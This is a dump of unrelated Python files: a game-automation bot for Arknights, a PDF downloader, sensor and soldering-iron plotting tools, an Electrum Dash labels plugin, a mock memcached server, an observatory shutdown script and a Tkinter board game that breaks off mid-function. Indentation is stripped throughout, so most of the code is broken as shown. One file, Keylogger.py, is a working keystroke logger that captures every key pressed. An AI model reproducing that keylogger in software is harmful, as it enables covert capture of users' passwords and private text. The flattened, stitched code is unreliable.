gamer.touch(rd.querenganyuan)
gamer.random_delay()
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.random_delay()
gamer.delay(3)
#选择第二个职业和干员
gamer.touch(rd.fuzhu)
gamer.random_delay()
gamer.touch(rd.xinlan)
gamer.random_delay()
gamer.touch(rd.querenganyuan)
gamer.random_delay()
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.random_delay()
gamer.delay(3)
#选择第三个职业和干员
gamer.touch(rd.yiliao)
gamer.random_delay()
gamer.touch(rd.furong)
gamer.random_delay()
gamer.touch(rd.querenganyuan)
gamer.random_delay()
gamer.delay(3)
gamer.touch(rd.skip)
# 与虫为伴关卡所需时间,单位为秒
fight_yu_chong_wei_ban_duration = 80
# 与虫为伴打法 在此定义 请参考这个方法内的注释来编写
def fight_yu_chong_wei_ban():
for i in range(4): # 循环做4次,以防中途有干员被打死然后就不部署了
# 刚进游戏画面时的延时,这里不需要设置太高,因为此时已经是二倍速状态,如果一开始使用的干员费用较高可以适当增大此值
gamer.delay(4)
# 这一行代码的意思是将临光放在指定位置,朝向向上,下同,这些都可以自己替换掉
fight_agent_arrange(rd.fight_icon_shan, rd.yuchongweiban_shan, Direction.UP)
# 放完临光后延时5秒再放下一个干员(注意费用回复时间)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.yuchongweiban_furong, Direction.LEFT)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.yuchongweiban_xinlan, Direction.LEFT)
gamer.delay(10)
# 驯兽小屋关卡所需时间,单位为秒
fight_xun_shou_xiao_wu_duration = 80
# 驯兽小屋打法 在此定义 参考 与虫为伴的注释
def fight_xun_shou_xiao_wu():
for i in range(4):
gamer.delay(4)
fight_agent_arrange(rd.fight_icon_shan, rd.xunshouxiaowu_shan, Direction.RIGHT)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.xunshouxiaowu_furong, Direction.DOWN)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.xunshouxiaowu_xinlan, Direction.DOWN)
gamer.delay(10)
# 礼炮小队关卡所需时间,单位为秒
fight_li_pao_xiao_dui_duration = 80
# 礼炮小队打法 在此定义 参考 与虫为伴的注释
def fight_li_pao_xiao_dui():
for i in range(4):
gamer.delay(4)
fight_agent_arrange(rd.fight_icon_shan, rd.lipaoxiaodui_shan, Direction.RIGHT)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.lipaoxiaodui_furong, Direction.UP)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.lipaoxiaodui_xinlan, Direction.DOWN)
gamer.delay(10)
# 意外关卡所需时间,单位为秒
fight_yi_wai_duration = 80
# 意外打法 在此定义 参考 与虫为伴的注释
def fight_yi_wai():
for i in range(4):
gamer.delay(4)
fight_agent_arrange(rd.fight_icon_shan, rd.yiwai_shan, Direction.DOWN)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.yiwai_furong, Direction.LEFT)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.yiwai_xinlan, Direction.LEFT)
gamer.delay(10)
# =======================================================================
# 以下部分请不要随意修改
# ADB运行
gamer.deviceType = 1
# 全局标志位 勿改动
isFightLose = False
#屏幕分辨率 勿改动 请与此保持对齐
screen_size = (2340, 1080)
#战斗界面干员部署通用方法 三个参数分别是 干员 站位 朝向(0-3分别代表上下左右)
def fight_agent_arrange(agent, pos, direction):
screen_w, screen_h = screen_size
x, y = pos
shift = settings.touchPosRange
if direction == Direction.UP:
_y = y - 400
if (_y < shift):
_y = shift
slide_final_pos = (x, _y)
elif direction == Direction.DOWN:
_y = y + 400
if (_y > screen_h - shift):
_y = screen_h - shift
slide_final_pos = (x, _y)
elif direction == Direction.LEFT:
_x = x - 400
if (_x < shift):
_x = shift
slide_final_pos = (_x, y)
elif direction == Direction.RIGHT:
_x = x + 400
if (_x > screen_w - shift):
_x = screen_w - shift
slide_final_pos = (_x, y)
else:
return False
if gamer.find_pic_slide(agent, pos):
gamer.delay(0.5)
gamer.slide((pos, slide_final_pos))
gamer.delay(0.5)
return True
return False
# 跳过结算画面
def skip_ending():
gamer.random_delay()
gamer.touch(rd.bottom)
gamer.delay(0.5)
gamer.touch(rd.bottom)
gamer.delay(0.5)
gamer.touch(rd.bottom)
gamer.delay(0.5)
gamer.touch(rd.bottom)
gamer.random_delay()
gamer.touch(rd.bottom)
# 战斗后处理
def process_after_fight():
for i in range(5): # 避免某些关卡有特殊怪,打得比较慢,重试五次检查结果状态,每次间隔10s
if gamer.find_pic_touch(rd.success_pass):
gamer.random_delay()
gamer.find_pic_touch(rd.nazou)
gamer.delay(1)
gamer.find_pic_touch(rd.exit)
gamer.delay(0.5)
if gamer.find_pic_touch(rd.exit_confirm):
return True
else:
return False
# 失败的情况考虑一下
elif gamer.find_pic_touch(rd.signal_lost):
gamer.random_delay()
gamer.delay(5)
skip_ending()
global isFightLose
isFightLose = True
else:
if i == 4:
return False
gamer.delay(10)
# 战斗前处理
def process_before_fight():
gamer.random_delay()
gamer.find_pic_touch(rd.enter)
gamer.random_delay()
gamer.find_pic_touch(rd.kaishixingdong)
gamer.delay(9) # 从点击开始行动按钮以后到进入游戏的延时9秒
gamer.find_pic_touch(rd.speed_1x) # 二倍速
# 普通战斗关卡
def fight():
global isFightLose
isFightLose = False
if gamer.find_pic_touch(rd.fight_lipaoxiaodui):
process_before_fight()
t = multiprocessing.Process(target=fight_li_pao_xiao_dui)
t.start()
gamer.delay(fight_li_pao_xiao_dui_duration)
t.terminate()
elif gamer.find_pic_touch(rd.fight_yuchongweiban):
process_before_fight()
t = multiprocessing.Process(target=fight_yu_chong_wei_ban)
t.start()
gamer.delay(fight_yu_chong_wei_ban_duration)
t.terminate()
elif gamer.find_pic_touch(rd.fight_xunshouxiaowu):
process_before_fight()
t = multiprocessing.Process(target=fight_xun_shou_xiao_wu)
t.start()
gamer.delay(fight_xun_shou_xiao_wu_duration)
t.terminate()
elif gamer.find_pic_touch(rd.fight_yiwai):
process_before_fight()
t = multiprocessing.Process(target=fight_yi_wai)
t.start()
gamer.delay(fight_yi_wai_duration)
t.terminate()
else:
return False
process_after_fight()
return True
# 不期而遇节点处理
def buqieryu():
if gamer.find_pic_touch(rd.buqieryu):
gamer.random_delay()
gamer.find_pic_touch(rd.enter_buqieryu)
gamer.delay(8) #等待展示文本时间
gamer.random_delay()
for i in range(2):
if gamer.find_pic_touch(rd.taopao):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
elif gamer.find_pic_touch(rd.xiwang):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
elif gamer.find_pic_touch(rd.shengming):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
elif gamer.find_pic_touch(rd.yuanshiding):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
else:
#下滑一点然后重试一次,防止展示不完全
gamer.slide(rd.right_slide_down)
gamer.delay(3)
gamer.touch(rd.bottom)
gamer.random_delay()
return True
else:
return False
# 诡异行商节点处理(刷投资)
def guiyixingshang():
if gamer.find_pic_touch(rd.guiyixingshang):
gamer.random_delay()
gamer.find_pic_touch(rd.enter_guiyixingshang)
gamer.delay(3)
gamer.random_delay()
if gamer.find_pic_touch(rd.touzi_enter):
gamer.find_pic_touch(rd.touzirukou)
gamer.random_delay()
pos = gamer.find_pic(rd.touzi_confirm, True)
for i in range(0,20): #点20次 投资确认
gamer.touch(pos)
gamer.delay(0.5)
gamer.find_pic_touch(rd.suanle)
gamer.random_delay()
gamer.find_pic_touch(rd.suanle2)
gamer.random_delay()
pos = gamer.find_pic(rd.exit_shop)
gamer.touch(pos)
gamer.random_delay()
gamer.touch(pos)
else:
pos = gamer.find_pic(rd.exit_shop)
gamer.touch(pos)
gamer.random_delay()
gamer.touch(pos)
return True
else:
return False
# 幕间余兴 这里直接选退出选项
def mujianyuxing():
if gamer.find_pic_touch(rd.mujianyuxing):
gamer.random_delay()
gamer.find_pic_touch(rd.enter_buqieryu)
gamer.delay(8) #等待展示文本时间
gamer.random_delay()
for i in range(2):
if gamer.find_pic_touch(rd.taopao):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
else:
#下滑一点然后重试一次,防止展示不完全
gamer.slide(rd.right_slide_down)
gamer.delay(3)
gamer.touch(rd.bottom)
gamer.random_delay()
return True
else:
return False
# 退出到主界面并放弃当前进度,重开
def exit_game():
gamer.find_pic_touch(rd.exit_all)
gamer.delay(2)
gamer.random_delay()
gamer.find_pic_touch(rd.giveup)
gamer.random_delay()
gamer.find_pic_touch(rd.giveup_confirm)
skip_ending()
# 干员编队部分,这里只要分辨率不变,操作是固定的
def gan_yuan_bian_dui():
gamer.touch((2076,1026))
gamer.random_delay()
gamer.touch((1846, 60))
gamer.random_delay()
gamer.touch((987,242))
gamer.random_delay()
gamer.touch((987, 446))
gamer.random_delay()
gamer.touch((987, 656))
gamer.random_delay()
gamer.touch((2078, 1022))
gamer.random_delay()
gamer.touch((195, 52))
# 脚本从这里开始运行
gamer.deviceType = 1
while True:
if gamer.find_pic_touch(rd.rg_start):
gamer.random_delay()
init_front()
gamer.random_delay()
if gamer.find_pic_touch(rd.enter_game):
gamer.delay(5)
gan_yuan_bian_dui()
# 第一层只有四关,且第一关只能是战斗节点
# 1
fight()
# TODO:可以考虑更智能的寻路算法,当前只支持按照固定优先级
# 2
gamer.random_delay()
if buqieryu() is False:
if fight() is False:
if mujianyuxing() is False:
exit_game()
continue
if isFightLose:
continue
# 中场滑屏到后面,避免重复识别
gamer.slide(rd.bottom_slide_left)
# 3
gamer.random_delay()
if buqieryu() is False:
if fight() is False:
if mujianyuxing() is False:
exit_game()
continue
if isFightLose:
continue
# 第四关只能是诡异行商
# 4
guiyixingshang()
gamer.delay(5)
gamer.random_delay()
exit_game()
else:
break
|
download_pdfs.py
|
import os
import time
import pickle
import random
import threading
import requests
import requests_random_user_agent
from utils import Config
timeout_secs = 10 # after this many seconds we give up on a paper
if not os.path.exists(Config.pdf_dir):
os.makedirs(Config.pdf_dir)
db = pickle.load(open(Config.db_path, 'rb'))
# for pid,j in db.items():
def download_one(pid_list):
# get list of all pdfs we already have
have = set(os.listdir(Config.pdf_dir))
numok = 0
numtot = 0
proxy = None
for pid in pid_list:
j = db[pid]
pdfs = [x['href']
for x in j['links'] if x['type'] == 'application/pdf']
assert len(pdfs) == 1
pdf_url = pdfs[0] + '.pdf'
basename = pdf_url.split('/')[-1]
fname = os.path.join(Config.pdf_dir, basename)
# try retrieve the pdf
numtot += 1
try:
if not basename in have:
print('fetching %s into %s' % (pdf_url, fname))
req = requests.get(
pdf_url, timeout=timeout_secs, proxies=proxy)
with open(fname, 'wb') as fp:
fp.write(req.content)
time.sleep(0.05 + random.uniform(0, 0.1))
else:
print('%s exists, skipping' % (fname, ))
numok += 1
except Exception as e:
print('error downloading: ', pdf_url)
print(e)
# change proxy
proxy_info = None
proxy = {'http': proxy_info, 'https': proxy_info}
print('%d/%d of %d downloaded ok.' % (numok, numtot, len(db)))
#print('final number of papers downloaded okay: %d/%d' % (numok, len(db)))
if __name__ == '__main__':
n_threads = 50
pid_list = list(db.keys())
stride = len(db)//n_threads
thread_pool = []
for start in range(0, len(db), stride):
end = min(start+stride, len(db))
t = threading.Thread(target=download_one, args=(pid_list[start:end],))
thread_pool.append(t)
t.start()
for t in thread_pool:
t.join()
|
gragh_test.py
|
import pygame
import threading
import multiprocessing
from colour import Color
GR_HEIGHT = 400
GR_WIDTH = GR_HEIGHT * 3
all_pixels_num =64
sensor_data = [29.8888]*all_pixels_num
bk_grd_data = [27.888]*all_pixels_num
pixels_row = 8
pixels_colum = 8
height = 480
width = 480
pixels_size_height = height /pixels_colum
pixels_size_width = width /pixels_row
num_color = (0,0,0)
resolution = (height,width )
num_size = height / pixels_row /2
max_temp = 31
min_temp = 26
color_resolution = 100
blue = Color("blue")
#list() turn the tuple to list.
colors = list(blue.range_to(Color("red"), color_resolution))
colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255)) for c in colors]
#print colors
def select_color(val):
if (val< min_temp):
return 0
return int((float(val)-min_temp)/(max_temp-min_temp) *color_resolution -1)
def conver_val_to_str(value):
val_str=str(value)
val_str=val_str[0:4]
return val_str
def raw():
while(1):
pygame.init()
gragh=pygame.display.set_mode( resolution)
gragh.fill((0,0,0))
font = pygame.font.Font(None, num_size)
pygame.mouse.set_visible(False)
pygame.display.set_caption("raw data!")
for i in range(pixels_row):
for j in range(pixels_colum):
pygame.draw.rect(gragh,colors[select_color(sensor_data[pixels_row*i+j])],(i*pixels_size_width,j*pixels_size_height,pixels_size_width,pixels_size_height))
num=font.render(conver_val_to_str(sensor_data[pixels_row*i+j]),0,num_color)
gragh.blit(num,(i*pixels_size_width,j*pixels_size_height))
pygame.display.update()
while 1:
pass
def back():
while 1:
while(1):
pygame.init()
gragh=pygame.display.set_mode( resolution)
gragh.fill((0,0,0))
font = pygame.font.Font(None, num_size)
pygame.mouse.set_visible(False)
pygame.display.set_caption("raw data!")
for i in range(pixels_row):
for j in range(pixels_colum):
pygame.draw.rect(gragh,colors[select_color(bk_grd_data[pixels_row*i+j])],(i*pixels_size_width,j*pixels_size_height,pixels_size_width,pixels_size_height))
num=font.render(conver_val_to_str(bk_grd_data[pixels_row*i+j]),0,num_color)
gragh.blit(num,(i*pixels_size_width,j*pixels_size_height))
pygame.display.update()
while 1:
pass
def ther():
while 1:
while(1):
pygame.init()
gragh=pygame.display.set_mode( resolution)
gragh.fill((0,0,0))
font = pygame.font.Font(None, num_size)
pygame.mouse.set_visible(False)
pygame.display.set_caption("raw data!")
for i in range(pixels_row):
for j in range(pixels_colum):
pygame.draw.rect(gragh,colors[select_color(sensor_data[pixels_row*i+j])],(i*pixels_size_width,j*pixels_size_height,pixels_size_width,pixels_size_height))
num=font.render(conver_val_to_str(sensor_data[pixels_row*i+j]),0,num_color)
gragh.blit(num,(i*pixels_size_width,j*pixels_size_height))
pygame.display.update()
while 1:
pass
P1=multiprocessing.Process(target = raw)
P2=multiprocessing.Process(target = back)
P3=multiprocessing.Process(target = ther)
P1.start()
P2.start()
P3.start()
'''
pygame.init()
raw_t = threading.Thread( target = raw)
bk_grd_t = threading.Thread(target = back)
#ther_t = threading.Thread(target = ther)
raw_t.start()
bk_grd_t.start()
#ther_t.start()
raw_t.join()
'''
|
iron-plotter.py
|
from datetime import datetime, timedelta
from multiprocessing.connection import Client, Listener
from multiprocessing import Process, Pipe
from collections import deque
from math import nan
import argparse
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib
def server(conn, serial_port):
import serial
tty = serial.Serial(serial_port, 2000000, timeout=None)
while True:
raw_line = tty.readline()
try:
raw_data = raw_line.decode('ascii').split(',')
if len(raw_data) != 5:
print(f"Received garbage data {raw_line}")
continue
time = datetime.utcnow()
tip = int(raw_data[0])
handle_x10 = int(raw_data[1])
power_x10 = int(raw_data[2])
pwm = int(raw_data[3])
tip_raw_uv = int(raw_data[4])
except Exception as ex:
print(
f"Received garbage data {raw_line} which caused exception: {ex}")
continue
conn.send({
'time': time,
'tip': tip,
'handle_x10': handle_x10,
'power_x10': power_x10,
'pwm': pwm,
'tip_raw_uv': tip_raw_uv,
})
def client(conn):
d_time = deque()
d_tip = deque()
d_handle = deque()
d_tipraw = deque()
d_power = deque()
d_pwm = deque()
fig: matplotlib.figure.Figure
ax: matplotlib.axes.Axes
ax1: matplotlib.axes.Axes
fig, (ax, ax1) = plt.subplots(2, 1, sharex=True,
gridspec_kw={'height_ratios': [2, 1]})
ax_2 = ax.twinx()
ax1_2 = ax1.twinx()
# plt.ion()
ax.set_xlabel('Time')
ax.set_ylabel('Temp (°C)')
ax.set_ylim(0, 450)
l_tip, = ax.plot([], '-r', label="Tip")
l_handle, = ax.plot([], '-g', label="Handle")
ax.legend(loc='upper left')
ax_2.set_ylabel('Thermocouple Raw (μV)')
ax_2.set_ylim(0, 20000)
l_tipraw, = ax_2.plot([], '-c', label="Tip Raw")
ax_2.yaxis.get_label().set_color(l_tipraw.get_color())
ax_2.legend(loc='upper right')
ax1.set_ylabel('Power (W)')
l_power, = ax1.plot([], '-b', label="Power")
ax1.yaxis.get_label().set_color(l_power.get_color())
ax1_2.set_ylabel('PWM [0-255]')
l_pwm, = ax1_2.plot([], '-y', label="PWM")
ax1_2.yaxis.get_label().set_color(l_pwm.get_color())
ax1_2.set_ylim(-5, 260)
ax1_2.set_yticks([0, 32, 64, 96, 128, 160, 192, 224, 256])
ax.grid()
ax1.grid()
plt.subplots_adjust(hspace=.0)
def run(_i):
now = datetime.utcnow()
cutoff = now - timedelta(seconds=30)
while len(d_time) > 0 and d_time[0] < cutoff:
d_time.popleft()
d_tip.popleft()
d_handle.popleft()
d_tipraw.popleft()
d_power.popleft()
d_pwm.popleft()
while conn.poll():
item = conn.recv()
if len(d_time) > 0 and (item['time'] - d_time[len(d_time) - 1]).total_seconds() >= 1:
d_time.append(item)
d_tip.append(nan)
d_handle.append(nan)
d_tipraw.append(nan)
d_power.append(nan)
d_pwm.append(nan)
d_time.append(item['time'])
d_tip.append(item['tip'])
d_handle.append(item['handle_x10'] / 10)
d_tipraw.append(item['tip_raw_uv'])
d_power.append(item['power_x10'] / 10)
d_pwm.append(item['pwm'])
l_tip.set_data(d_time, d_tip)
l_handle.set_data(d_time, d_handle)
l_tipraw.set_data(d_time, d_tipraw)
l_power.set_data(d_time, d_power)
l_pwm.set_data(d_time, d_pwm)
ax.set_xlim(cutoff, now)
ax1.relim()
ax1.autoscale(axis='y')
return [l_tip, l_handle, l_tipraw, l_power, l_pwm]
ani = animation.FuncAnimation(fig, run, interval=200, blit=False)
plt.show(block=True)
conn.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("command", help="Action - server reads from serial port, client plots data, leave out to run both",
nargs='?', choices=["server", "client", "all"], default="all")
parser.add_argument(
"serial_port", help="The serial port to use, only used for server. Default: /dev/ttyAMA0", nargs='?', default="/dev/ttyAMA0")
parser.add_argument(
"--addr", help="The address to connect/bind to, not used if running both. Default: 0.0.0.0 for server and 127.0.0.1 for client")
parser.add_argument(
"--port", help="The port to connect/bind to, not used if running both. Default: 3000", type=int, default=3000)
args = parser.parse_args()
if args.command == "server":
address = (args.addr if args.addr is not None else "0.0.0.0", args.port)
print(f"Listening on {address}")
listener = Listener(address, family='AF_INET', authkey=b'IronOS')
conn = listener.accept()
listener.close()
server(conn, args.serial_port)
elif args.command == "client":
address = (args.addr if args.addr is not None else "127.0.0.1", args.port)
print(f"Connecting to {address}")
conn = Client(address, family='AF_INET', authkey=b'IronOS')
print(f"Connected!")
client(conn)
elif args.command == "all":
pipe_a, pipe_b = Pipe()
p = Process(target=server, args=(pipe_a, args.serial_port))
p.start()
try:
client(pipe_b)
finally:
p.join(3)
if p.is_alive():
p.terminate()
else:
parser.print_help()
|
Keylogger.py
|
# Import modules
from pynput.keyboard import Listener, Key # pip install pynput
from threading import Thread
class Logger:
# Constructor
def __init__(self):
self.__keys = ''
self.__stopped = None
self.__thread = self.__NewThread()
# Log key press
def __LogKeyPress(self, key: str):
key_text = str(key)
for old, new in {
'Key.space': ' ',
'Key.enter': '\n',
'\'': '',
'Key.': ''
}.items(): key_text = key_text.replace(old, new)
if key == Key.backspace and len(self.__keys) > 0:
self.__keys = self.__keys[:-1]
if len(key_text) > 1:
key_text = f"[{key_text}]".upper()
self.__keys += key_text
if self.__stopped:
return False
# Run logger
def __Run(self):
with Listener(on_press=self.__LogKeyPress) as listener:
listener.start()
listener.join()
# Return new thread
def __NewThread(self):
return Thread(target=self.__Run)
# Return all logs
def FetchLogs(self) -> str:
return self.__keys
# Clean logs
def CleanLogs(self):
self.__keys = ''
# Start keylogger
def Start(self):
self.__stopped = False
self.__thread.start()
# Stop keylogger
def Stop(self):
self.__stopped = True
self.__thread.join()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum_dash
from electrum_dash.plugins import BasePlugin, hook
from electrum_dash.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.bauerj.eu'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum_dash.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum_dash.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if not wallet in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.print_error("could not retrieve labels")
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
mock_binary_server.py
|
import socket
import socketserver
import threading
class MockMemSession(socketserver.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
self.server.append(data)
self.server.server.basic_handler(self.server.data, self.request)
class MockMemcachedServerInternal(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, address, port, request_class, server):
super(MockMemcachedServerInternal, self).__init__(server_address=(address, port),
RequestHandlerClass=request_class)
self.data = []
self.server = server
def append(self, data):
self.data.append(data)
def reset(self):
self.data = []
def log(self, msg):
self.server.log(msg)
def pop(self, n):
data = b''
if n >= len(self.data):
data = self.data[:]
self.data = []
else:
data = self.data[:n]
self.data = self.data[n:]
return data
class MockMemcachedServer:
def __init__(self, address='127.0.0.1', port=52135, debug=False, handler=None):
socketserver.TCPServer.allow_reuse_address = True
self.debug = debug
self.address = address
self.port = port
self.server = MockMemcachedServerInternal(address, port, MockMemSession, self)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.test_handler = handler
self.running = False
def set_debug(self, debug):
self.debug = debug
def set_handler(self, handler):
self.test_handler = handler
def start(self):
self.running = True
self.log('Starting server thread at {}:{}'.format(self.address, self.port))
self.server_thread.start()
def basic_handler(self, data, req):
self.log('Data: {}'.format(data))
if self.test_handler:
self.test_handler(data, req, self.debug)
def stop(self):
self.log('Shut down server')
if self.running:
self.server.shutdown()
self.log('Socket close')
self.server.socket.close()
self.log('Joining')
if self.running:
self.server_thread.join()
self.running = False
self.log('Thread finished')
def reset(self):
self.test_handler = None
self.server.reset()
def get_host_address(self):
return self.address, self.port
def log(self, msg):
if self.debug:
print(msg)
|
ocs_end_of_night_process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import multiprocessing
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(multiprocessing.current_process().name))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do end_of_night stuff
if entobj:
# disable
entobj.logger.info('{0:s}.disable()'.format(entity))
entobj.disable()
# standby
entobj.logger.info('{0:s}.standby()'.format(entity))
entobj.standby()
# exit control
entobj.logger.info('{0:s}.exitcontrol()'.format(entity))
entobj.exitcontrol()
# return
return
# +
# main()
# -
if __name__ == "__main__":
# created shared entities
camera = OcsCameraEntity('CCS', 'Camera', False)
sequencer = OcsSequencerEntity('OCS', 'ocs', False)
# create jobs for each entity:
jobs = []
for E in ( camera, sequencer ):
j = multiprocessing.Process(target=worker_code, args=(E._entity, E))
jobs.append(j)
j.start()
for j in jobs:
j.join()
print('{0:s}.exitcode: {1:s}'.format(j.name, str(j.exitcode)))
|
TkBoard.py
|
import socket, sys, time
from Tkinter import *
from math import floor
from GameStack import GameStack
import Helpers as h
from sys import argv
from time import sleep
from threading import Thread
from threading import Timer
import time
import select
# TODO - print graph
socket_list = [] #Accepting incoming connections
WON1=0
WON2=0
winners=0
el=1
class TkBoard():
# CONSTANTS
N=13
M=13
K=14
SQUARE_SIZE = 20
PLAYER_SIZE = SQUARE_SIZE * 0.8
SQUARE_SPACING = 10
MARGIN = 20
is_redo_m=False
PANEL_WIDTH = 200
ICON_MARGIN = 55
BUTTON_Y_START = 125
BUTTON_WIDTH = 100
BUTTON_HEIGHT = 30
BUTTON_MARGIN = 10
LABEL_Y_START = 330
LABEL_FONT_SIZE = 12
LABEL_SPACING = 10
LABEL_TEXT = lambda s, n, c: ("%-"+str(n+7)+"s") % ("walls: "+"I"*c) # lambda c: "Walls: {0}".format(c)
DEFAULT_COLORS = {'bg': '#FFFFFF',
'square': '#333333',
'wall': '#DD6611',
'wall-error': '#CC1111',
'panel': '#333333',
'button': '#555555',#'#AA5303',
'text': '#000000',
'players': ['#11CC11', '#CC11CC', '#CC1111', '#11CCCC']
}
# CLASS VARIABLES - DRAWING
tk_root = None
tk_canv = None
players = []
player_ghost = None
icon = None
ai_label = None
squares = [[0]*13]*13
wall_labels = []
grid = None
canvas_dims = (0,0)
buttons = [] # will contain bbox and callback as tuple for each button
walls = {} # will be dictionary of name => id. all will exist, transparency toggled, colors changed for errors
active_wall = ""
active_move = ""
recent_x = 0
recent_y = 0
# GAME-INTERACTION VARIABLES
gs = None
moveType = "move"
game_over = False
# CONTROL VARIABLES
THREAD_SLEEP = 0.1
def set_default_colors(new_colors_dict={}):
"""update default colors with given dictionary of new color scheme
Given colors don't need to be complete - only updates those given"""
for k in new_colors_dict.keys():
if k in self.DEFAULT_COLORS.keys():
self.DEFAULT_COLORS[k] = new_colors_dict[k]
def new_game(self, np=2, nai=0):
"""Destroy old board, draw new board, update object state with new board
"""
if self.tk_root:
self.tk_root.destroy()
self.tk_root = Tk()
self.tk_root.bind("<Escape>", lambda e: self.handle_quit())
self.tk_root.bind("<Motion>", lambda e: self.handle_mouse_motion(e.x, e.y))
self.thread_kill = False
self.time_stats = []
# margin - space/2 - square - space - square - ... - square - space/2 - margin - panel
total_height = 13*self.SQUARE_SIZE + 13*self.SQUARE_SPACING + 2*self.MARGIN
total_width = total_height + self.PANEL_WIDTH
self.canvas_dims = (total_width, total_height)
self.tk_canv = Canvas(self.tk_root, width=total_width, height=total_height, background=self.DEFAULT_COLORS['bg'])
self.tk_canv.pack()
self.draw_squares()
self.generate_walls()
self.game_stack = GameStack(np, nai)
self.update_gs()
self.players = [(None, None)]*len(self.gs.players)
self.max_walls = self.gs.current_player.num_walls
self.wall_labels = [None]*len(self.gs.players)
self.draw_panel()
self.refresh(False)
th = Thread(target = lambda : self.background_loop())
th.start()
self.tk_root.mainloop()
def update_gs(self):
self.gs = self.game_stack.current
def background_loop(self):
global WON1
global WON2
